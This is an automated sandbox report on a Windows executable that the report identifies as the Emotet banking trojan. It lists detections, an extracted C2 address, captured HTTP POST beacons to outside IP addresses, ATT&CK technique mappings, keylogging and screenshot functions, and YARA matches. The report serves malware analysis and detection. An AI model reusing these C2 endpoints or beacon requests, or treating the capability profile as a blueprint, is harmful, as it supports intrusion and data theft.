
Analysis Report service.exe

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 206794
Start date: 07.02.2020
Start time: 16:40:15
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 44s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: service.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name: Run as Windows Service
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winEXE@16/3@0/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 78.1% (good quality ratio 74.6%)
  • Quality average: 80.6%
  • Quality standard deviation: 28.4%
HCA Information:
  • Successful, ratio: 77%
  • Number of executed functions: 52
  • Number of non-executed functions: 428
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | | false | Emotet | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification

Analysis Advice

Initial sample is implementing a service and should be registered / started as service
Sample is a service DLL but no service has been registered
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts1 | Execution through API121 | Hidden Files and Directories1 | Valid Accounts1 | Deobfuscate/Decode Files or Information1 | Input Capture1 | System Time Discovery2 | Remote File Copy2 | Screen Capture1 | Data Encrypted11 | Commonly Used Port1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact1
Replication Through Removable Media | Command-Line Interface2 | Valid Accounts1 | Access Token Manipulation1 | Obfuscated Files or Information2 | Network Sniffing | Security Software Discovery12 | Remote Services | Input Capture1 | Exfiltration Over Other Network Medium | Remote File Copy2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Service Execution13 | Modify Existing Service12 | Process Injection11 | Masquerading12 | Input Capture | System Service Discovery1 | Windows Remote Management | Clipboard Data1 | Automated Exfiltration | Standard Cryptographic Protocol22 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Scheduled Task | New Service4 | New Service4 | Hidden Files and Directories1 | Credentials in Files | File and Directory Discovery2 | Logon Scripts | Input Capture | Data Encrypted | Standard Non-Application Layer Protocol2 | SIM Card Swap | | Premium SMS Toll Fraud
Exploit Public-Facing Application | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Valid Accounts1 | Account Manipulation | System Information Discovery36 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Application Layer Protocol13 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Access Token Manipulation1 | Brute Force | Process Discovery2 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | | Abuse Accessibility Features
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Process Injection11 | Two-Factor Authentication Interception | Application Window Discovery1 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Windows\Temp\setup.exe | Avira: detection malicious, Label: TR/AD.Emotet.pabfv
Antivirus detection for sample
Source: service.exe | Avira: detection malicious, Label: TR/Emotet.rcdix
Found malware configuration
Source: msradvb.exe.4612.11.memstr | Malware Configuration Extractor: Emotet {"C2 list": ["108.6.140.26/HgsN9LrPL"]}
Multi AV Scanner detection for dropped file
Source: C:\Windows\Temp\setup.exe | Virustotal: Detection: 72%
Multi AV Scanner detection for submitted file
Source: service.exe | Virustotal: Detection: 64%
Machine Learning detection for sample
Source: service.exe | Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_0065207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_0065215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_00651F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_00651F56 CryptGetHashParam
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_00651F11 CryptExportKey
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_00651FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\service.exe | Code function: 7_2_0037479C FindFirstFileExA
Source: C:\Windows\Temp\setup.exe | Code function: 8_2_00426C63 lstrlenA,FindFirstFileA,FindClose
Source: C:\Windows\Temp\setup.exe | Code function: 8_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_00426C63 lstrlenA,FindFirstFileA,FindClose
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 10_2_00426C63 lstrlenA,FindFirstFileA,FindClose
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 10_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 11_2_00426C63 lstrlenA,FindFirstFileA,FindClose
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 11_2_0041F3E5 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA

Networking:

Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: UUNET-MCICommunicationsServicesIncdbaVerizonBusi
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected:
  POST /09FGR20HEU738LDF007E848F715BVE.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 45.79.223.161:443
  Content-Length: 11
  Cache-Control: no-cache
  Data Raw: 63 3d 69 6e 73 74 61 6c 6c 65 64
  Data Ascii: c=installed
Source: global traffic | HTTP traffic detected:
  POST /HgsN9LrPL HTTP/1.1
  Referer: http://108.6.140.26/HgsN9LrPL
  Content-Type: application/x-www-form-urlencoded
  DNT: 1
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 108.6.140.26
  Content-Length: 676
  Connection: Keep-Alive
  Cache-Control: no-cache
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknown | TCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknown | TCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknown | TCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknown | TCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknown | TCP traffic detected without corresponding DNS query: 108.6.140.26
Source: unknown | TCP traffic detected without corresponding DNS query: 108.6.140.26
Source: unknown | TCP traffic detected without corresponding DNS query: 108.6.140.26
Source: unknown | TCP traffic detected without corresponding DNS query: 108.6.140.26
Source: unknown | TCP traffic detected without corresponding DNS query: 108.6.140.26
Source: unknown | TCP traffic detected without corresponding DNS query: 108.6.140.26
Source: unknown | TCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknown | TCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknown | TCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknown | TCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknown | TCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknown | TCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknown | TCP traffic detected without corresponding DNS query: 45.79.223.161
Source: unknown | TCP traffic detected without corresponding DNS query: 108.6.140.26
Posts data to webserver
Source: unknown | HTTP traffic detected:
  POST /09FGR20HEU738LDF007E848F715BVE.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 45.79.223.161:443
  Content-Length: 11
  Cache-Control: no-cache
  Data Raw: 63 3d 69 6e 73 74 61 6c 6c 65 64
  Data Ascii: c=installed
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Fri, 07 Feb 2020 15:41:34 GMT
  Content-Type: text/html; charset=utf-8
  Content-Length: 548
  Connection: keep-alive
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Urls found in memory or binary data
Source: msradvb.exe, 0000000B.00000002.5987599317.0000000000199000.00000004.00000001.sdmp | String found in binary or memory: http://108.6.140.26/HgsN9LrPL
Source: service.exe | String found in binary or memory: http://www.PowerProgrammer.co.uk(
Source: msradvb.exe, service.exe | String found in binary or memory: http://www.Powerprogrammer.co.uk
Source: service.exe | String found in binary or memory: http://www.Powerprogrammer.co.ukOnTopbad
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49868

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Windows\Temp\setup.exe | Code function: 8_2_0040307D EndDialog,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetWindowPlacement,GetDlgItemInt,GetDlgItemInt,GetDlgItemInt,GetWindowPlacement,SetWindowPlacement,GetWindowPlacement,GetDesktopWindow,GetWindowPlacement,SetWindowPlacement,SetDlgItemInt,SetDlgItemInt,GetDlgItemInt,GetDlgItemInt,GetWindowPlacement,SetWindowPlacement,IsDlgButtonChecked,IsDlgButtonChecked,SetWindowPos,IsDlgButtonChecked,ShowWindow,Beep,Beep,GetDC,CreateCompatibleDC,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,DeleteDC,ReleaseDC,Beep,ShowWindow,ShellExecuteA,CheckDlgButton,CheckDlgButton,CheckDlgButton,SetWindowPos,GetWindowPlacement
Contains functionality to record screenshots
Source: C:\Windows\Temp\setup.exe | Code function: 8_2_0040307D EndDialog,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetWindowPlacement,GetDlgItemInt,GetDlgItemInt,GetDlgItemInt,GetWindowPlacement,SetWindowPlacement,GetWindowPlacement,GetDesktopWindow,GetWindowPlacement,SetWindowPlacement,SetDlgItemInt,SetDlgItemInt,GetDlgItemInt,GetDlgItemInt,GetWindowPlacement,SetWindowPlacement,IsDlgButtonChecked,IsDlgButtonChecked,SetWindowPos,IsDlgButtonChecked,ShowWindow,Beep,Beep,GetDC,CreateCompatibleDC,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,DeleteDC,ReleaseDC,Beep,ShowWindow,ShellExecuteA,CheckDlgButton,CheckDlgButton,CheckDlgButton,SetWindowPos,GetWindowPlacement
Potential key logger detected (key state polling based)
Source: C:\Windows\Temp\setup.exe | Code function: 8_2_0042E273 GetKeyState,GetKeyState,GetKeyState
Source: C:\Windows\Temp\setup.exe | Code function: 8_2_00424642 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent
Source: C:\Windows\Temp\setup.exe | Code function: 8_2_0040A722 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: C:\Windows\Temp\setup.exe | Code function: 8_2_00431187 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent
Source: C:\Windows\Temp\setup.exe | Code function: 8_2_0042F5B7 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow
Source: C:\Windows\Temp\setup.exe | Code function: 8_2_004118CE GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_0042E273 GetKeyState,GetKeyState,GetKeyState
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_00424642 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_0040A722 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_00431187 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_0042F5B7 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_004118CE GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 10_2_0042E273 GetKeyState,GetKeyState,GetKeyState
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 10_2_00424642 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 10_2_0040A722 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 10_2_00431187 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 10_2_0042F5B7 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 10_2_004118CE GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 11_2_0042E273 GetKeyState,GetKeyState,GetKeyState
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 11_2_00424642 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 11_2_0040A722 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 11_2_00431187 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 11_2_0042F5B7 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow
Source: C:\Windows\SysWOW64\msradvb.exe | Code function: 11_2_004118CE GetKeyState,GetKeyState,GetKeyState,GetKeyState

E-Banking Fraud:

Detected Emotet e-Banking trojan
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_0065CCBC
Yara detected Emotet
Source: Yara match | File source: 00000009.00000002.4301641382.0000000000651000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4300993909.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.4298966674.0000000000651000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4276006913.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.5988263486.00000000005E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.5987644935.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4276050052.0000000000E21000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.4298327167.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Windows\Temp\setup.exe | Code function: 9_2_00651F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext

System Summary:

Malicious sample detected (through community Yara rule)Show sources
Source: 00000009.00000002.4301641382.0000000000651000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000009.00000002.4300993909.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000A.00000002.4298966674.0000000000651000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000008.00000002.4276006913.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000B.00000002.5988263486.00000000005E1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000B.00000002.5987644935.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000008.00000002.4276050052.0000000000E21000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 0000000A.00000002.4298327167.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Contains functionality to delete servicesShow sources
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0065CE88 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,9_2_0065CE88
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00651D2B CreateProcessAsUserW,CreateProcessW,9_2_00651D2B
Creates files inside the system directoryShow sources
Source: C:\Users\user\Desktop\service.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_0037ACC57_2_0037ACC5
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004560218_2_00456021
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004361AF8_2_004361AF
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0044033D8_2_0044033D
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004324308_2_00432430
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004565638_2_00456563
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004365CF8_2_004365CF
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0040C62E8_2_0040C62E
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0044C6B18_2_0044C6B1
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00456BC28_2_00456BC2
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00456E368_2_00456E36
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00450E918_2_00450E91
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00440EAF8_2_00440EAF
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00446EA98_2_00446EA9
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00446FBF8_2_00446FBF
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004571408_2_00457140
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004393B68_2_004393B6
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004354FC8_2_004354FC
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0044D6DD8_2_0044D6DD
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0044D8CA8_2_0044D8CA
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004578CA8_2_004578CA
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004499CC8_2_004499CC
Source: C:\Windows\Temp\setup.exeCode function: 8_2_004359CF8_2_004359CF
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00459A218_2_00459A21
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00455AF88_2_00455AF8
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00435DA38_2_00435DA3
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00443FC38_2_00443FC3
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E128C18_2_00E128C1
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E130E48_2_00E130E4
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E130E88_2_00E130E8
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E1F1ED8_2_00E1F1ED
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E237A58_2_00E237A5
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E237A98_2_00E237A9
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00E22F828_2_00E22F82
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004560219_2_00456021
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004361AF9_2_004361AF
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0044033D9_2_0044033D
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004324309_2_00432430
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004565639_2_00456563
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004365CF9_2_004365CF
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0040C62E9_2_0040C62E
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0044C6B19_2_0044C6B1
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00456BC29_2_00456BC2
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00456E369_2_00456E36
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00450E919_2_00450E91
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00440EAF9_2_00440EAF
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00446EA99_2_00446EA9
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00446FBF9_2_00446FBF
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004571409_2_00457140
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004393B69_2_004393B6
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004354FC9_2_004354FC
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0044D6DD9_2_0044D6DD
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0044D8CA9_2_0044D8CA
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004578CA9_2_004578CA
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004499CC9_2_004499CC
Source: C:\Windows\Temp\setup.exeCode function: 9_2_004359CF9_2_004359CF
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00459A219_2_00459A21
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00455AF89_2_00455AF8
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00435DA39_2_00435DA3
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00443FC39_2_00443FC3
Source: C:\Windows\Temp\setup.exeCode function: 9_2_001F28C19_2_001F28C1
Source: C:\Windows\Temp\setup.exeCode function: 9_2_001F30E89_2_001F30E8
Source: C:\Windows\Temp\setup.exeCode function: 9_2_001F30E49_2_001F30E4
Source: C:\Windows\Temp\setup.exeCode function: 9_2_006537A59_2_006537A5
Source: C:\Windows\Temp\setup.exeCode function: 9_2_006537A99_2_006537A9
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00652F829_2_00652F82
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0045602110_2_00456021
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004361AF10_2_004361AF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0044033D10_2_0044033D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0043243010_2_00432430
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0045656310_2_00456563
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_004365CF10_2_004365CF
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0040C62E10_2_0040C62E
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0044C6B110_2_0044C6B1
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00456BC210_2_00456BC2
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00456E3610_2_00456E36
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00450E9110_2_00450E91
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00440EAF10_2_00440EAF
